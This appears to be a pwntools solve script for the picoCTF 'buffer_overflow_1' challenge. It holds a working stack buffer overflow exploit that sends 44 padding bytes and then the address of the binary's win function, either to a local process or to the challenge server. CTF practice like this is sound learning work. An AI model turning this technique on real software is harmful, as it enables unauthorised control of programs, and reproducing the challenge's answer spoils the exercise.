picoctf/pwn/buffer_overflow_1/solve.py

#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools

from pwn import *

exe = ELF("./vuln")

context.binary = exe

ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()

def conn():
    if args.REMOTE:
        r = remote(ADDR, PORT)
    else:
        r = process([exe.path])

    return r

def main():
  r = conn()

  r.recvuntil(b"Please enter your string:")
  offset = 44 # found with pwndbg
  payload = b'A' * offset + p32(exe.sym.win)
  r.sendline(payload)
  print(r.recvall())
  r.close()

if __name__ == "__main__":
    main()